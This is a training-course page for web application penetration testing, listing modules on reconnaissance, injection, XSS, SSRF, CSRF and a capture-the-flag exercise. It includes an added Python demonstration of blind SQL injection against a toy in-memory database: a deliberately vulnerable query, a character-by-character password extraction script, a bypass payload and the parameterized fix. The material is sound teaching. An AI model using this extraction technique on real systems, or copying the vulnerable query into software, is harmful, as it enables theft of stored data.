Web App Penetration Testing and Ethical Hacking
This course enables students to assess a web application's security posture and convincingly demonstrate the business impact should attackers exploit the discovered vulnerabilities. You will practice the art of exploiting web applications to find flaws in your enterprise's web apps. You will learn about the attacker's tools and methods and, through detailed hands-on exercises, a best-practice process for web application penetration testing: inject SQL into back-end databases to learn how attackers exfiltrate sensitive data, and use cross-site scripting attacks to compromise a target's users and pivot into its infrastructure. (Online classes available)
Skills Gained
YOU WILL BE ABLE TO:
- Apply OWASP’s methodology to your web application penetration tests to ensure they are consistent, reproducible, rigorous, and under quality control.
- Analyze the results from automated web testing tools to validate findings, determine their business impact, and eliminate false positives.
- Manually discover key web application flaws.
- Use Python to create testing and exploitation scripts during a penetration test.
- Discover and exploit SQL Injection flaws to determine true risk to the victim organization.
- Understand and exploit insecure deserialization vulnerabilities with ysoserial and similar tools.
- Create configurations and test payloads for other web attacks.
- Fuzz potential inputs for injection attacks with ZAP, Burp Intruder and ffuf.
- Explain the impact of exploitation of web application flaws.
- Analyze traffic between the client and the server application using tools such as the Zed Attack Proxy and BurpSuite Pro to find security issues within the client-side application code.
- Manually discover and exploit Cross-Site Request Forgery (CSRF) flaws.
- Manually discover and exploit Server-Side Request Forgery (SSRF) flaws.
- Use the Browser Exploitation Framework (BeEF) to hook victim browsers, attack client software and the network, and evaluate the potential impact that XSS flaws have within an application.
- Use the Nuclei tool to perform scans of target web sites/servers.
- Perform two complete web penetration tests, one during the five sections of course instruction, and the other during the Capture the Flag exercise.
BUSINESS TAKEAWAYS:
- Apply a repeatable methodology to deliver high-value penetration tests
- Discover and exploit key web application flaws
- Explain the potential impact of web application vulnerabilities
- Convey the importance of web application security to an overall security posture
- Wield key web application attack tools more efficiently
- Write web application penetration test reports
Course Content:
Module 1: Introduction and Information Gathering
Overview
Understanding the attacker's perspective is key to successful web application penetration testing. The course begins by thoroughly examining foundational concepts such as web technology, including protocols, languages, clients, and server architectures, from the attacker's perspective. We look at collecting open-source intelligence (OSINT) focused on the data points most likely to make exploitation successful, and we analyze the importance of encryption and HTTPS.
Section one concludes with profiling the target(s) to understand the underlying configuration. The collected data is used to build a profile of each server and identify potential configuration flaws. The discussion is reinforced through several practical, hands-on labs in which we conduct reconnaissance in order to find forgotten virtual hosts. Students get deeper hands-on experience with BurpSuite Pro, cURL, and manual reconnaissance and profiling techniques with tools such as nmap and testssl.sh.
Topics
- Overview of the web from a penetration tester’s perspective
- Web application assessment methodologies
- The penetration tester’s toolkit
- Interception proxies
- Proxying SSL through BurpSuite Pro and Zed Attack Proxy
- DNS reconnaissance
- Virtual host discovery
- Open-source intelligence (OSINT)
- The HTTP protocol
- Secure Sockets Layer (SSL)/TLS configurations and weaknesses
- Target discovery and profiling
- Configuration flaws
Module 2: Content Discovery, Authentication, and Session Testing
Overview
Modern web applications frequently are not monitored as closely as they should be, giving attackers the opportunity to discover, and exploit, vulnerabilities without anyone noticing. A system's configuration should include proper logging and monitoring to ensure security-related events are not missed. That is why in this section we briefly explore logging configuration and basic incident response testing.
We enumerate the application's pages and features. This phase involves identifying the components, analyzing the relationships between them, and determining how the pieces work together. We then dive deep into the spidering/crawling results, which represent a vital part of the overall penetration test, and perform forced browsing to find hidden content in a lab. This lab also introduces an extremely fast fuzzer, ffuf.
Topics
- Logging and monitoring
- Learning tools to spider a website
- Analyzing website content
- Brute forcing unlinked files and directories via ZAP and ffuf
- Web authentication mechanisms
- Fuzzing with Burp Intruder
- Username harvesting and password guessing
- Burp sequencer
- Session management and attacks
- Authentication and authorization bypass
- Mutillidae
Module 3: Injection
Overview
After ending section two with authentication bypass, we begin section three by exploring security-related protections included in the web server responses: cookie flags and response headers.
This course section dives deeply into vital manual testing techniques for vulnerability discovery. We focus on developing in-depth knowledge of interception proxies for web application vulnerability discovery. Many of the most common injection flaws (command injection, and local and remote file inclusion) are introduced and followed with lab exercises to reinforce discovery and exploitation.
This section also covers insecure deserialization, a common vulnerability in object-oriented programming languages. Students exploit a Java insecure deserialization vulnerability in a lab to steal a secret file from a vulnerable web application. This lab requires more effort and demonstrates chaining of vulnerabilities to achieve the final goal.
Due to its prevalence and the significant impact generally associated with the flaw, a considerable portion of this section is devoted to traditional and blind SQL injection.
Topics
- HTTP response security controls
- Command injection
- Directory traversal
- Local File Inclusion (LFI)
- Remote File Inclusion (RFI)
- Insecure deserialization
- SQL injection
- Blind SQL injection
- Error-based SQL injection
- Exploiting SQL injection
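As an added illustration of the blind SQL injection material in this module (and of the Python scripting listed under Skills Gained), the following example is not course material; it was written for this page. It models a deliberately vulnerable username lookup over an in-memory SQLite table (the schema, rows, the secret password value and all function names are assumptions made for the example), derives a boolean oracle from it, recovers a column one character at a time by binary search, and shows the parameterized query that closes the hole.

```python
"""Boolean-based blind SQL injection, end to end: a deliberately vulnerable
lookup, the yes/no oracle an attacker derives from it, an extraction script
that recovers a column one character at a time, and the parameterized fix.
Added example; the schema, data and function names are assumptions."""
import sqlite3

# Constructed in-memory database standing in for the application's back end.
# Table, columns and the secret value are made up for this example.
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
_conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                  [(1, "admin", "S3cr3t!"), (2, "alice", "wonderland")])
_conn.commit()

_stats = {"queries": 0}  # counts the round trips an attacker would have to make


def vulnerable_lookup(username: str) -> bool:
    """Deliberately vulnerable: the query is built by string concatenation.
    The application only reveals whether a row matched (True/False)."""
    sql = "SELECT id FROM users WHERE username = '" + username + "'"
    _stats["queries"] += 1
    return _conn.execute(sql).fetchone() is not None


def safe_lookup(username: str) -> bool:
    """Hardened version: a bound parameter, so the input is data, never SQL."""
    sql = "SELECT id FROM users WHERE username = ?"
    return _conn.execute(sql, (username,)).fetchone() is not None


def oracle(condition: str) -> bool:
    """Turn the lookup into a yes/no oracle: 'admin' exists, so the response
    is True exactly when the injected condition is true. The trailing '--'
    comments out the closing quote the application appends."""
    return vulnerable_lookup("admin' AND (" + condition + ")--")


def extract_secret(column: str, target_user: str, max_len: int = 64):
    """Recover users.<column> for target_user using only the boolean oracle.
    Each character is found by binary search over code points 0..127, so it
    costs 7 oracle queries plus 1 length check, instead of up to 128 guesses.
    Returns (recovered_value, number_of_oracle_queries_used)."""
    start = _stats["queries"]
    sub = f"(SELECT {column} FROM users WHERE username = '{target_user}')"
    recovered = ""
    for pos in range(1, max_len + 1):
        # Stop when the string has no character at this position.
        if not oracle(f"length({sub}) >= {pos}"):
            break
        lo, hi = 0, 127
        while lo < hi:  # invariant: the code point lies in [lo, hi]
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr({sub}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered, _stats["queries"] - start


if __name__ == "__main__":
    print("classic bypass:", vulnerable_lookup("x' OR '1'='1"))  # True
    print("same input, fixed:", safe_lookup("x' OR '1'='1"))      # False
    secret, n = extract_secret("password", "admin")
    print(f"recovered {secret!r} with {n} boolean queries")       # 'S3cr3t!' with 57
```

Against a real target, `vulnerable_lookup` is replaced by an HTTP request and a check on the response (status code, length, or a marker string), which is exactly what Burp Intruder, ZAP and sqlmap automate; the binary search is what keeps a blind extraction to a few hundred requests rather than tens of thousands. Note that the fix is the bound parameter in `safe_lookup`, not input filtering: the same `' OR '1'='1` input simply becomes a username nobody has.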
Module 4: XSS, SSRF, and XXE
Overview
Section four continues exploring injection flaws and spends time introducing Cross-Site Scripting (XSS) vulnerabilities, including reflected, stored, and DOM-based XSS. Manual discovery methods are employed during hands-on labs, and students are introduced to the developer tools in browsers as a means of analyzing client-side JavaScript in modern web applications.
Section four also introduces the Browser Exploitation Framework (BeEF), which is used in multiple labs. The course continues with a detailed discussion of AJAX as we explore how it enlarges the attack surface leveraged by penetration testers. We also analyze how AJAX is affected by other vulnerabilities already covered in depth earlier in the course.
We discuss REST (Representational State Transfer) and SOAP (Simple Object Access Protocol). Finally, section four ends with server-side request forgery (SSRF) and XML external entities (XXE), both of which have an associated lab. Again, in the SSRF lab multiple vulnerabilities are chained, relying on previously covered material.
Topics
- Cross-Site Scripting (XSS)
- Browser Exploitation Framework (BeEF)
- AJAX
- XML and JSON
- Document Object Model (DOM)
- API attacks
- Data attacks
- REST and SOAP
- Server-Side Request Forgery (SSRF)
- XML External Entity (XXE)
Module 5: CSRF, Logic Flaws and Advanced Tools
Overview
During the fifth section, we launch actual exploits against real-world applications, expand our foothold within the application, and extend it to the network on which it resides. As penetration testers, we specifically focus on ways to leverage previously discovered vulnerabilities to gain further access, highlighting the cyclical nature of web application penetration testing.
During our exploitation phase, we expand our use of tools such as ZAP and BurpSuite Pro, and complement them with further use of sqlmap and Metasploit to help craft exploits against various web applications. We launch SQL injection and Cross-Site Request Forgery attacks, amongst others. In class we exploit these flaws to perform data theft, hijack sessions, deface a website, get shells, pivot against connected networks, and much more. Through various forms of exploitation, students gain a keen understanding of the potential business impact of these flaws to an organization.
Topics
- Cross-Site Request Forgery (CSRF)
- Logic attacks
- Python for web app penetration testing
- WPScan
- ExploitDB
- BurpSuite Pro scanner
- Nuclei
- Metasploit
- When tools fail
- Business of penetration testing: preparation
- Business of penetration testing: post-assessment and reporting
Module 6: Capture The Flag
Overview
During section six, students form teams and compete in a web application penetration testing tournament. This NetWars-powered Capture-the-Flag exercise gives students an opportunity to wield their newly developed or further honed skills to answer questions, complete missions, and exfiltrate data, applying skills gained throughout the course. The style of challenge and the integrated hint system allow students of various skill levels to both enjoy a game environment and solidify the skills learned in class.
Who is this course for?
- General security practitioners
- Penetration testers
- Ethical hackers
- Web application developers
- Website designers, architects, and developers
International student fee: US$950
Flexible Class Options
- Weekend classes for professionals (Sat | Sun)
- Corporate group trainings available
- Online classes: Live Virtual Class (LVC), online training
Related Courses
Security Awareness – Managing Human Risk
Introduction to Cyber Security
Implementing and Auditing Security Frameworks and Controls
Security Essentials – Network, Endpoint, and Cloud
Hacker Tools, Techniques, and Incident Handling
Network Monitoring and Threat Detection In-Depth
Security Leadership Essentials for Managers